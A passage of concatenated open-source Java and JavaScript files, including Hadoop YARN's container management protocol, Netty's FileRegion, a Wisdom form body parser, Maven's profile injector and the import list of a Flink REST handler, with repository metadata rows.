    return Collections.enumeration(values());
  }
  /** Legacy Hashtable-style enumeration over the keys. */
  public Enumeration<K> keys() {
    return Collections.enumeration(keySet());
  }
}
| rgoldberg/guava | guava-gwt/src-super/java/util/super/java/util/concurrent/ConcurrentHashMap.java | Java | apache-2.0 | 3,773 |
sap.ui.define(['sap/ui/core/mvc/Controller'],
	function(Controller) {
	"use strict";
	/**
	 * Controller for the MenuButton sample view.
	 * Shows MessageToasts for the button's default action and for
	 * selections made from the attached menu.
	 */
	var MBController = Controller.extend("sap.m.sample.MenuButton.MB", {
		// Fired when the MenuButton's default (split) action is pressed.
		onDefaultAction: function() {
			sap.m.MessageToast.show("Default action triggered");
		},
		// Fired by the "accept" variant of the default action.
		onDefaultActionAccept: function() {
			sap.m.MessageToast.show("Accepted");
		},
		// Builds a "Grandparent > Parent > Item" path by walking from the
		// selected MenuItem up through its MenuItem ancestors.
		onMenuAction: function(oEvent) {
			var oItem = oEvent.getParameter("item"),
				sItemPath = "";
			while (oItem instanceof sap.m.MenuItem) {
				sItemPath = oItem.getText() + " > " + sItemPath;
				oItem = oItem.getParent();
			}
			// Drop the trailing " > " separator. slice() replaces the
			// deprecated substr(); with start 0 the two are equivalent here
			// (the path is either empty or ends with the separator).
			sItemPath = sItemPath.slice(0, sItemPath.lastIndexOf(" > "));
			sap.m.MessageToast.show("Action triggered on item: " + sItemPath);
		}
	});
	return MBController;
});
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.yarn.api;
import java.io.IOException;
import org.apache.hadoop.classification.InterfaceAudience.Public;
import org.apache.hadoop.classification.InterfaceStability.Stable;
import org.apache.hadoop.classification.InterfaceStability.Unstable;
import org.apache.hadoop.yarn.api.protocolrecords.CommitResponse;
import org.apache.hadoop.yarn.api.protocolrecords.IncreaseContainersResourceRequest;
import org.apache.hadoop.yarn.api.protocolrecords.IncreaseContainersResourceResponse;
import org.apache.hadoop.yarn.api.protocolrecords.GetContainerStatusesRequest;
import org.apache.hadoop.yarn.api.protocolrecords.GetContainerStatusesResponse;
import org.apache.hadoop.yarn.api.protocolrecords.ReInitializeContainerRequest;
import org.apache.hadoop.yarn.api.protocolrecords.ReInitializeContainerResponse;
import org.apache.hadoop.yarn.api.protocolrecords.ResourceLocalizationRequest;
import org.apache.hadoop.yarn.api.protocolrecords.ResourceLocalizationResponse;
import org.apache.hadoop.yarn.api.protocolrecords.RestartContainerResponse;
import org.apache.hadoop.yarn.api.protocolrecords.RollbackResponse;
import org.apache.hadoop.yarn.api.protocolrecords.SignalContainerRequest;
import org.apache.hadoop.yarn.api.protocolrecords.SignalContainerResponse;
import org.apache.hadoop.yarn.api.protocolrecords.StartContainerRequest;
import org.apache.hadoop.yarn.api.protocolrecords.StartContainersRequest;
import org.apache.hadoop.yarn.api.protocolrecords.StartContainersResponse;
import org.apache.hadoop.yarn.api.protocolrecords.StopContainersRequest;
import org.apache.hadoop.yarn.api.protocolrecords.StopContainersResponse;
import org.apache.hadoop.yarn.api.records.Container;
import org.apache.hadoop.yarn.api.records.ContainerId;
import org.apache.hadoop.yarn.api.records.ContainerLaunchContext;
import org.apache.hadoop.yarn.api.records.ContainerStatus;
import org.apache.hadoop.yarn.exceptions.NMNotYetReadyException;
import org.apache.hadoop.yarn.exceptions.YarnException;
/**
* <p>The protocol between an <code>ApplicationMaster</code> and a
* <code>NodeManager</code> to start/stop and increase resource of containers
* and to get status of running containers.</p>
*
* <p>If security is enabled the <code>NodeManager</code> verifies that the
* <code>ApplicationMaster</code> has truly been allocated the container
* by the <code>ResourceManager</code> and also verifies all interactions such
* as stopping the container or obtaining status information for the container.
* </p>
*/
@Public
@Stable
public interface ContainerManagementProtocol {
  /**
   * <p>
   * The <code>ApplicationMaster</code> provides a list of
   * {@link StartContainerRequest}s to a <code>NodeManager</code> to
   * <em>start</em> {@link Container}s allocated to it using this interface.
   * </p>
   *
   * <p>
   * The <code>ApplicationMaster</code> has to provide details such as allocated
   * resource capability, security tokens (if enabled), command to be executed
   * to start the container, environment for the process, necessary
   * binaries/jar/shared-objects etc. via the {@link ContainerLaunchContext} in
   * the {@link StartContainerRequest}.
   * </p>
   *
   * <p>
   * The <code>NodeManager</code> sends a response via
   * {@link StartContainersResponse} which includes a list of
   * {@link Container}s of successfully launched {@link Container}s, a
   * containerId-to-exception map for each failed {@link StartContainerRequest} in
   * which the exception indicates errors from per container and a
   * allServicesMetaData map between the names of auxiliary services and their
   * corresponding meta-data. Note: None-container-specific exceptions will
   * still be thrown by the API method itself.
   * </p>
   * <p>
   * The <code>ApplicationMaster</code> can use
   * {@link #getContainerStatuses(GetContainerStatusesRequest)} to get updated
   * statuses of the to-be-launched or launched containers.
   * </p>
   *
   * @param request
   *          request to start a list of containers
   * @return response including conatinerIds of all successfully launched
   *         containers, a containerId-to-exception map for failed requests and
   *         a allServicesMetaData map.
   * @throws YarnException
   * @throws IOException
   * @throws NMNotYetReadyException
   *           This exception is thrown when NM starts from scratch but has not
   *           yet connected with RM.
   */
  @Public
  @Stable
  StartContainersResponse startContainers(StartContainersRequest request)
      throws YarnException, IOException;
  /**
   * <p>
   * The <code>ApplicationMaster</code> requests a <code>NodeManager</code> to
   * <em>stop</em> a list of {@link Container}s allocated to it using this
   * interface.
   * </p>
   *
   * <p>
   * The <code>ApplicationMaster</code> sends a {@link StopContainersRequest}
   * which includes the {@link ContainerId}s of the containers to be stopped.
   * </p>
   *
   * <p>
   * The <code>NodeManager</code> sends a response via
   * {@link StopContainersResponse} which includes a list of {@link ContainerId}
   * s of successfully stopped containers, a containerId-to-exception map for
   * each failed request in which the exception indicates errors from per
   * container. Note: None-container-specific exceptions will still be thrown by
   * the API method itself. <code>ApplicationMaster</code> can use
   * {@link #getContainerStatuses(GetContainerStatusesRequest)} to get updated
   * statuses of the containers.
   * </p>
   *
   * @param request
   *          request to stop a list of containers
   * @return response which includes a list of containerIds of successfully
   *         stopped containers, a containerId-to-exception map for failed
   *         requests.
   * @throws YarnException
   * @throws IOException
   */
  @Public
  @Stable
  StopContainersResponse stopContainers(StopContainersRequest request)
      throws YarnException, IOException;
  /**
   * <p>
   * The API used by the <code>ApplicationMaster</code> to request for current
   * statuses of <code>Container</code>s from the <code>NodeManager</code>.
   * </p>
   *
   * <p>
   * The <code>ApplicationMaster</code> sends a
   * {@link GetContainerStatusesRequest} which includes the {@link ContainerId}s
   * of all containers whose statuses are needed.
   * </p>
   *
   * <p>
   * The <code>NodeManager</code> responds with
   * {@link GetContainerStatusesResponse} which includes a list of
   * {@link ContainerStatus} of the successfully queried containers and a
   * containerId-to-exception map for each failed request in which the exception
   * indicates errors from per container. Note: None-container-specific
   * exceptions will still be thrown by the API method itself.
   * </p>
   *
   * @param request
   *          request to get <code>ContainerStatus</code>es of containers with
   *          the specified <code>ContainerId</code>s
   * @return response containing the list of <code>ContainerStatus</code> of the
   *         successfully queried containers and a containerId-to-exception map
   *         for failed requests.
   *
   * @throws YarnException
   * @throws IOException
   */
  @Public
  @Stable
  GetContainerStatusesResponse getContainerStatuses(
      GetContainerStatusesRequest request) throws YarnException,
      IOException;
  /**
   * <p>
   * The API used by the <code>ApplicationMaster</code> to request for
   * resource increase of running containers on the <code>NodeManager</code>.
   * </p>
   *
   * @param request
   *          request to increase resource of a list of containers
   * @return response which includes a list of containerIds of containers
   *         whose resource has been successfully increased and a
   *         containerId-to-exception map for failed requests.
   *
   * @throws YarnException
   * @throws IOException
   */
  @Public
  @Unstable
  IncreaseContainersResourceResponse increaseContainersResource(
      IncreaseContainersResourceRequest request) throws YarnException,
      IOException;
  /**
   * The API used by the <code>ApplicationMaster</code> to request delivery of
   * a signal to a container, as described by the
   * {@link SignalContainerRequest}.
   *
   * NOTE(review): unlike every other method of this protocol, this
   * declaration carries no audience/stability annotations -- presumably an
   * omission; confirm whether it should be annotated like its siblings.
   *
   * @param request request specifying the container and the signal to deliver
   * @return response indicating that the signal request has been accepted
   * @throws YarnException Exception specific to YARN.
   * @throws IOException IOException thrown from the RPC layer.
   */
  SignalContainerResponse signalToContainer(SignalContainerRequest request)
      throws YarnException, IOException;
  /**
   * Localize resources required by the container.
   * Currently, this API only works for running containers.
   *
   * @param request Specify the resources to be localized.
   * @return Response that the localize request is accepted.
   * @throws YarnException Exception specific to YARN
   * @throws IOException IOException thrown from the RPC layer.
   */
  @Public
  @Unstable
  ResourceLocalizationResponse localize(ResourceLocalizationRequest request)
      throws YarnException, IOException;
  /**
   * ReInitialize the Container with a new Launch Context.
   * @param request Specify the new ContainerLaunchContext.
   * @return Response that the ReInitialize request is accepted.
   * @throws YarnException Exception specific to YARN.
   * @throws IOException IOException thrown from the RPC layer.
   */
  @Public
  @Unstable
  ReInitializeContainerResponse reInitializeContainer(
      ReInitializeContainerRequest request) throws YarnException, IOException;
  /**
   * Restart the container.
   * @param containerId Container Id.
   * @return Response that the restart request is accepted.
   * @throws YarnException Exception specific to YARN.
   * @throws IOException IOException thrown from the RPC layer.
   */
  @Public
  @Unstable
  RestartContainerResponse restartContainer(ContainerId containerId)
      throws YarnException, IOException;
  /**
   * Rollback the Last ReInitialization if possible.
   * @param containerId Container Id.
   * @return Response that the rollback request is accepted.
   * @throws YarnException Exception specific to YARN.
   * @throws IOException IOException thrown from the RPC layer.
   */
  @Public
  @Unstable
  RollbackResponse rollbackLastReInitialization(ContainerId containerId)
      throws YarnException, IOException;
  /**
   * Commit the Last ReInitialization if possible. Once the reinitialization
   * has been committed, It cannot be rolled back.
   * @param containerId Container Id.
   * @return Response that the commit request is accepted.
   * @throws YarnException Exception specific to YARN.
   * @throws IOException IOException thrown from the RPC layer.
   */
  @Public
  @Unstable
  CommitResponse commitLastReInitialization(ContainerId containerId)
      throws YarnException, IOException;
}
| WIgor/hadoop | hadoop-yarn-project/hadoop-yarn/hadoop-yarn-api/src/main/java/org/apache/hadoop/yarn/api/ContainerManagementProtocol.java | Java | apache-2.0 | 11,258 |
/*
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package org.apache.batik.anim.timing;
/**
* An adapter class for {@link TimegraphListener}s.
*
* @author <a href="mailto:cam%40mcc%2eid%2eau">Cameron McCormack</a>
* @version $Id: TimegraphAdapter.java 475477 2006-11-15 22:44:28Z cam $
*/
public class TimegraphAdapter implements TimegraphListener {
    /**
     * Invoked to indicate that a timed element has been added to the
     * document.
     */
    public void elementAdded(TimedElement e) {
    }
    /**
     * Invoked to indicate that a timed element has been removed from the
     * document.
     */
    public void elementRemoved(TimedElement e) {
    }
    /**
     * Invoked to indicate that a timed element has become active.
     * @param e the TimedElement that became active
     * @param t the time (in parent simple time) that the element became active
     */
    public void elementActivated(TimedElement e, float t) {
    }
    /**
     * Invoked to indicate that a timed element has become inactive
     * and is filling.
     */
    public void elementFilled(TimedElement e, float t) {
    }
    /**
     * Invoked to indicate that a timed element has become inactive
     * and is not filling.
     */
    public void elementDeactivated(TimedElement e, float t) {
    }
    /**
     * Invoked to indicate that an interval was created for the given
     * timed element.
     */
    public void intervalCreated(TimedElement e, Interval i) {
    }
    /**
     * Invoked to indicate that an interval was removed for the given
     * timed element.
     */
    public void intervalRemoved(TimedElement e, Interval i) {
    }
    /**
     * Invoked to indicate that an interval's endpoints were changed.
     */
    public void intervalChanged(TimedElement e, Interval i) {
    }
    /**
     * Invoked to indicate that the given interval began.
     * @param i the Interval that began, or null if no interval is
     *          active for the given timed element.
     */
    public void intervalBegan(TimedElement e, Interval i) {
    }
    /**
     * Invoked to indicate that the given timed element began a repeat
     * iteration at the specified time.
     */
    public void elementRepeated(TimedElement e, int i, float t) {
    }
    /**
     * Invoked to indicate that the list of instance times for the given
     * timed element has been updated.
     * NOTE(review): the second parameter is declared {@code float isBegin};
     * the name suggests a begin/end flag while the type suggests a time --
     * confirm the intended semantics against the TimegraphListener interface.
     */
    public void elementInstanceTimesChanged(TimedElement e, float isBegin) {
    }
}
| sflyphotobooks/crp-batik | sources/org/apache/batik/anim/timing/TimegraphAdapter.java | Java | apache-2.0 | 3,242 |
/*
* Copyright 2012 The Netty Project
*
* The Netty Project licenses this file to you under the Apache License,
* version 2.0 (the "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*/
package org.jboss.netty.channel.core;
import java.io.IOException;
import java.nio.channels.FileChannel;
import java.nio.channels.WritableByteChannel;
import org.jboss.netty.util.ExternalResourceReleasable;
/**
 * A region of a file that is sent via a {@link Channel} which supports
 * <a href="http://en.wikipedia.org/wiki/Zero-copy">zero-copy file transfer</a>.
 *
 * <h3>Upgrade your JDK / JRE</h3>
 *
 * {@link FileChannel#transferTo(long, long, WritableByteChannel)} has at least
 * four known bugs in the old versions of Sun JDK and perhaps its derived ones.
 * Please upgrade your JDK to 1.6.0_18 or later version if you are going to use
 * zero-copy file transfer.
 * <ul>
 * <li><a href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=5103988">5103988</a>
 *   - FileChannel.transferTo() should return -1 for EAGAIN instead throws IOException</li>
 * <li><a href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=6253145">6253145</a>
 *   - FileChannel.transferTo() on Linux fails when going beyond 2GB boundary</li>
 * <li><a href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=6427312">6427312</a>
 *   - FileChannel.transferTo() throws IOException "system call interrupted"</li>
 * <li><a href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=6470086">6470086</a>
 *   - FileChannel.transferTo(2147483647, 1, channel) causes "Value too large" exception</li>
 * </ul>
 *
 * <h3>Check your operating system and JDK / JRE</h3>
 *
 * If your operating system (or JDK / JRE) does not support zero-copy file
 * transfer, sending a file with {@link FileRegion} might fail or yield worse
 * performance.  For example, sending a large file doesn't work well in Windows.
 *
 * <h3>Not all transports support it</h3>
 *
 * Currently, the NIO transport is the only transport that supports {@link FileRegion}.
 * Attempting to write a {@link FileRegion} to non-NIO {@link Channel} will trigger
 * a {@link ClassCastException} or a similar exception.
 */
public interface FileRegion extends ExternalResourceReleasable {
    // FIXME Make sure all transports support writing a FileRegion
    //       Even if zero copy cannot be achieved, all transports should emulate it.
    /**
     * Returns the offset in the file where the transfer began.
     */
    long getPosition();
    /**
     * Returns the number of bytes to transfer.
     */
    long getCount();
    /**
     * Transfers the content of this file region to the specified channel.
     *
     * @param target    the destination of the transfer
     * @param position  the relative offset of the file where the transfer
     *                  begins from.  For example, <tt>0</tt> will make the
     *                  transfer start from {@link #getPosition()}th byte and
     *                  <tt>{@link #getCount()} - 1</tt> will make the last
     *                  byte of the region transferred.
     */
    long transferTo(WritableByteChannel target, long position) throws IOException;
}
| xiexingguang/simple-netty-source | src/main/java/org/jboss/netty/channel/core/FileRegion.java | Java | apache-2.0 | 3,614 |
/*
* #%L
* Wisdom-Framework
* %%
* Copyright (C) 2013 - 2014 Wisdom Framework
* %%
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* #L%
*/
package org.wisdom.content.bodyparsers;
import com.google.common.collect.ImmutableList;
import org.apache.felix.ipojo.annotations.Component;
import org.apache.felix.ipojo.annotations.Instantiate;
import org.apache.felix.ipojo.annotations.Provides;
import org.apache.felix.ipojo.annotations.Requires;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.wisdom.api.content.BodyParser;
import org.wisdom.api.content.ParameterFactories;
import org.wisdom.api.http.Context;
import org.wisdom.api.http.FileItem;
import org.wisdom.api.http.MimeTypes;
import org.wisdom.content.converters.ReflectionHelper;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Type;
import java.util.List;
import java.util.Map;
import java.util.Map.Entry;
@Component
@Provides
@Instantiate
public class BodyParserForm implements BodyParser {
    // Logger named after the concrete class. Previously this was
    // LoggerFactory.getLogger(BodyParser.class), which made every
    // BodyParser implementation log under the same category.
    private static final Logger LOGGER = LoggerFactory.getLogger(BodyParserForm.class);
    private static final String ERROR_KEY = "Error parsing incoming form data for key ";
    private static final String ERROR_AND = " and value ";
    @Requires
    ParameterFactories converters;
    /**
     * Creates a object of class T from a form sent in the request.
     * Binding happens in four passes: query parameters, path parameters,
     * form fields and finally uploaded file items. Conversion failures are
     * logged and skipped so a single bad field never aborts the binding.
     *
     * @param context The context
     * @param classOfT The class we expect
     * @param genericType the generic type (ignored)
     * @param <T> the class ot the object to build
     * @return the object, {@code null} if the object cannot be built.
     */
    @Override
    public <T> T invoke(Context context, Class<T> classOfT, Type genericType) {
        T t;
        try {
            t = classOfT.newInstance();
        } catch (Exception e) {
            LOGGER.error("Failed to create a new instance of {}", classOfT, e);
            return null;
        }
        Map<String, ReflectionHelper.Property> properties = ReflectionHelper.getProperties(classOfT, genericType);
        // 1) Query parameters (multi-valued).
        bindMultiValued(t, properties, context.parameters());
        // 2) Path parameters. Rarely used in forms, hence the 'debug' log level.
        final Map<String, String> fromPath = context.route().getPathParametersEncoded(context.request().uri());
        for (Entry<String, String> ent : fromPath.entrySet()) {
            try {
                ReflectionHelper.Property property = properties.get(ent.getKey());
                if (property != null) {
                    Object value = converters.convertValue(ent.getValue(), property.getClassOfProperty(),
                            property.getGenericTypeOfProperty(), null);
                    property.set(t, value);
                }
            } catch (Exception e) {
                LOGGER.debug(ERROR_KEY + ent.getKey() + ERROR_AND + ent.getValue(), e);
            }
        }
        // 3) Form fields (multi-valued).
        // NOTE(review): when the form is null/empty we return before looking at
        // file items, so a multipart request carrying only files is not bound.
        // Behavior kept as-is -- confirm this is intentional.
        if (context.form() == null || context.form().isEmpty()) {
            return t;
        }
        bindMultiValued(t, properties, context.form());
        // 4) File items: bound to InputStream, FileItem or byte[] properties.
        if (context.files() == null || context.files().isEmpty()) {
            return t;
        }
        for (FileItem item : context.files()) {
            try {
                ReflectionHelper.Property property = properties.get(item.field());
                if (property != null) {
                    if (InputStream.class.isAssignableFrom(property.getClassOfProperty())) {
                        property.set(t, item.stream());
                    } else if (FileItem.class.isAssignableFrom(property.getClassOfProperty())) {
                        property.set(t, item);
                    } else if (property.getClassOfProperty().isArray()
                            && property.getClassOfProperty().getComponentType().equals(Byte.TYPE)) {
                        property.set(t, item.bytes());
                    }
                }
            } catch (Exception e) {
                LOGGER.warn(ERROR_KEY + item.field() + ERROR_AND + item, e);
            }
        }
        return t;
    }
    /**
     * Binds multi-valued entries (query parameters or form fields) onto the
     * matching properties of the target object. Entries without a matching
     * property are ignored; conversion failures are logged at 'warn' and
     * skipped.
     *
     * @param target the object being populated
     * @param properties the writable properties of the target's class, by name
     * @param values the multi-valued entries to bind
     * @param <T> the type of the target object
     */
    private <T> void bindMultiValued(T target, Map<String, ReflectionHelper.Property> properties,
                                     Map<String, List<String>> values) {
        for (Entry<String, List<String>> ent : values.entrySet()) {
            try {
                ReflectionHelper.Property property = properties.get(ent.getKey());
                if (property != null) {
                    Object value = converters.convertValues(ent.getValue(), property.getClassOfProperty(),
                            property.getGenericTypeOfProperty(), null);
                    property.set(target, value);
                }
            } catch (Exception e) {
                LOGGER.warn(ERROR_KEY + ent.getKey() + ERROR_AND + ent.getValue(), e);
            }
        }
    }
    /**
     * Creates a object of class T from a form sent in the request.
     *
     * @param context The context
     * @param classOfT The class we expect
     * @param <T> the class ot the object to build
     * @return the object, {@code null} if the object cannot be built.
     */
    @Override
    public <T> T invoke(Context context, Class<T> classOfT) {
        return invoke(context, classOfT, null);
    }
    /**
     * Unsupported operation.
     *
     * @param bytes the content
     * @param classOfT The class we expect
     * @param <T> the class
     * @return nothing as this method is not supported
     */
    @Override
    public <T> T invoke(byte[] bytes, Class<T> classOfT) {
        throw new UnsupportedOperationException("Cannot bind a raw byte[] to a form object");
    }
    /**
     * @return a list containing {@code application/x-www-form-urlencoded} and {@code multipart/form}.
     */
    public List<String> getContentTypes() {
        return ImmutableList.of(MimeTypes.FORM, MimeTypes.MULTIPART);
    }
}
| torito/wisdom | core/content-manager/src/main/java/org/wisdom/content/bodyparsers/BodyParserForm.java | Java | apache-2.0 | 6,932 |
package org.apache.maven.model.profile;
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
import java.util.ArrayList;
import java.util.Collections;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import javax.inject.Named;
import javax.inject.Singleton;
import org.apache.maven.model.Build;
import org.apache.maven.model.BuildBase;
import org.apache.maven.model.Model;
import org.apache.maven.model.ModelBase;
import org.apache.maven.model.Plugin;
import org.apache.maven.model.PluginContainer;
import org.apache.maven.model.PluginExecution;
import org.apache.maven.model.Profile;
import org.apache.maven.model.ReportPlugin;
import org.apache.maven.model.ReportSet;
import org.apache.maven.model.Reporting;
import org.apache.maven.model.building.ModelBuildingRequest;
import org.apache.maven.model.building.ModelProblemCollector;
import org.apache.maven.model.merge.MavenModelMerger;
/**
* Handles profile injection into the model.
*
* @author Benjamin Bentmann
*/
@Named
@Singleton
@SuppressWarnings( { "checkstyle:methodname" } )
public class DefaultProfileInjector
implements ProfileInjector
{
private ProfileModelMerger merger = new ProfileModelMerger();
@Override
public void injectProfile( Model model, Profile profile, ModelBuildingRequest request,
ModelProblemCollector problems )
{
if ( profile != null )
{
merger.mergeModelBase( model, profile );
if ( profile.getBuild() != null )
{
if ( model.getBuild() == null )
{
model.setBuild( new Build() );
}
merger.mergeBuildBase( model.getBuild(), profile.getBuild() );
}
}
}
/**
* ProfileModelMerger
*/
protected static class ProfileModelMerger
extends MavenModelMerger
{
        /**
         * Merges the non-build parts of the profile (source) into the model
         * (target), with the profile dominating on conflicts.
         */
        public void mergeModelBase( ModelBase target, ModelBase source )
        {
            mergeModelBase( target, source, true, Collections.emptyMap() );
        }
        /**
         * Merges the profile's build section (source) into the model's build
         * section (target), with the profile dominating on conflicts.
         */
        public void mergeBuildBase( BuildBase target, BuildBase source )
        {
            mergeBuildBase( target, source, true, Collections.emptyMap() );
        }
        /**
         * Merges the profile's plugins (source) into the model's plugin
         * container (target). Plugins present on both sides are merged in
         * place; profile-only plugins are spliced in just before the next
         * plugin both sides share (or appended at the end when there is no
         * later shared plugin), so the target's ordering is preserved.
         */
        @Override
        protected void mergePluginContainer_Plugins( PluginContainer target, PluginContainer source,
                                                     boolean sourceDominant, Map<Object, Object> context )
        {
            List<Plugin> src = source.getPlugins();
            if ( !src.isEmpty() )
            {
                List<Plugin> tgt = target.getPlugins();
                // Index the target's plugins by key, preserving their order.
                Map<Object, Plugin> master = new LinkedHashMap<>( tgt.size() * 2 );
                for ( Plugin element : tgt )
                {
                    Object key = getPluginKey().apply( element );
                    master.put( key, element );
                }
                // 'pending' accumulates source-only plugins; when a shared
                // plugin is hit, they are recorded as its predecessors.
                Map<Object, List<Plugin>> predecessors = new LinkedHashMap<>();
                List<Plugin> pending = new ArrayList<>();
                for ( Plugin element : src )
                {
                    Object key = getPluginKey().apply( element );
                    Plugin existing = master.get( key );
                    if ( existing != null )
                    {
                        mergePlugin( existing, element, sourceDominant, context );
                        if ( !pending.isEmpty() )
                        {
                            predecessors.put( key, pending );
                            pending = new ArrayList<>();
                        }
                    }
                    else
                    {
                        pending.add( element );
                    }
                }
                // Rebuild the list in target order, inserting each shared
                // plugin's recorded predecessors before it, then any leftover
                // source-only plugins at the end.
                List<Plugin> result = new ArrayList<>( src.size() + tgt.size() );
                for ( Map.Entry<Object, Plugin> entry : master.entrySet() )
                {
                    List<Plugin> pre = predecessors.get( entry.getKey() );
                    if ( pre != null )
                    {
                        result.addAll( pre );
                    }
                    result.add( entry.getValue() );
                }
                result.addAll( pending );
                target.setPlugins( result );
            }
        }
@Override
protected void mergePlugin_Executions( Plugin target, Plugin source, boolean sourceDominant,
Map<Object, Object> context )
{
List<PluginExecution> src = source.getExecutions();
if ( !src.isEmpty() )
{
List<PluginExecution> tgt = target.getExecutions();
Map<Object, PluginExecution> merged =
new LinkedHashMap<>( ( src.size() + tgt.size() ) * 2 );
for ( PluginExecution element : tgt )
{
Object key = getPluginExecutionKey().apply( element );
merged.put( key, element );
}
for ( PluginExecution element : src )
{
Object key = getPluginExecutionKey().apply( element );
PluginExecution existing = merged.get( key );
if ( existing != null )
{
mergePluginExecution( existing, element, sourceDominant, context );
}
else
{
merged.put( key, element );
}
}
target.setExecutions( new ArrayList<>( merged.values() ) );
}
}
@Override
protected void mergeReporting_Plugins( Reporting target, Reporting source, boolean sourceDominant,
Map<Object, Object> context )
{
List<ReportPlugin> src = source.getPlugins();
if ( !src.isEmpty() )
{
List<ReportPlugin> tgt = target.getPlugins();
Map<Object, ReportPlugin> merged =
new LinkedHashMap<>( ( src.size() + tgt.size() ) * 2 );
for ( ReportPlugin element : tgt )
{
Object key = getReportPluginKey().apply( element );
merged.put( key, element );
}
for ( ReportPlugin element : src )
{
Object key = getReportPluginKey().apply( element );
ReportPlugin existing = merged.get( key );
if ( existing == null )
{
merged.put( key, element );
}
else
{
mergeReportPlugin( existing, element, sourceDominant, context );
}
}
target.setPlugins( new ArrayList<>( merged.values() ) );
}
}
@Override
protected void mergeReportPlugin_ReportSets( ReportPlugin target, ReportPlugin source, boolean sourceDominant,
Map<Object, Object> context )
{
List<ReportSet> src = source.getReportSets();
if ( !src.isEmpty() )
{
List<ReportSet> tgt = target.getReportSets();
Map<Object, ReportSet> merged = new LinkedHashMap<>( ( src.size() + tgt.size() ) * 2 );
for ( ReportSet element : tgt )
{
Object key = getReportSetKey().apply( element );
merged.put( key, element );
}
for ( ReportSet element : src )
{
Object key = getReportSetKey().apply( element );
ReportSet existing = merged.get( key );
if ( existing != null )
{
mergeReportSet( existing, element, sourceDominant, context );
}
else
{
merged.put( key, element );
}
}
target.setReportSets( new ArrayList<>( merged.values() ) );
}
}
}
}
| olamy/maven | maven-model-builder/src/main/java/org/apache/maven/model/profile/DefaultProfileInjector.java | Java | apache-2.0 | 9,121 |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.flink.runtime.rest.handler.job;
import org.apache.flink.annotation.VisibleForTesting;
import org.apache.flink.api.common.time.Time;
import org.apache.flink.runtime.execution.ExecutionState;
import org.apache.flink.runtime.executiongraph.AccessExecutionVertex;
import org.apache.flink.runtime.executiongraph.ArchivedExecutionGraph;
import org.apache.flink.runtime.executiongraph.ErrorInfo;
import org.apache.flink.runtime.rest.handler.HandlerRequest;
import org.apache.flink.runtime.rest.handler.legacy.ExecutionGraphCache;
import org.apache.flink.runtime.rest.messages.EmptyRequestBody;
import org.apache.flink.runtime.rest.messages.JobExceptionsInfo;
import org.apache.flink.runtime.rest.messages.JobExceptionsInfoWithHistory;
import org.apache.flink.runtime.rest.messages.JobIDPathParameter;
import org.apache.flink.runtime.rest.messages.MessageHeaders;
import org.apache.flink.runtime.rest.messages.ResponseBody;
import org.apache.flink.runtime.rest.messages.job.JobExceptionsMessageParameters;
import org.apache.flink.runtime.rest.messages.job.UpperLimitExceptionParameter;
import org.apache.flink.runtime.scheduler.ExecutionGraphInfo;
import org.apache.flink.runtime.scheduler.exceptionhistory.ExceptionHistoryEntry;
import org.apache.flink.runtime.scheduler.exceptionhistory.RootExceptionHistoryEntry;
import org.apache.flink.runtime.taskmanager.TaskManagerLocation;
import org.apache.flink.runtime.webmonitor.RestfulGateway;
import org.apache.flink.runtime.webmonitor.history.ArchivedJson;
import org.apache.flink.runtime.webmonitor.history.JsonArchivist;
import org.apache.flink.runtime.webmonitor.retriever.GatewayRetriever;
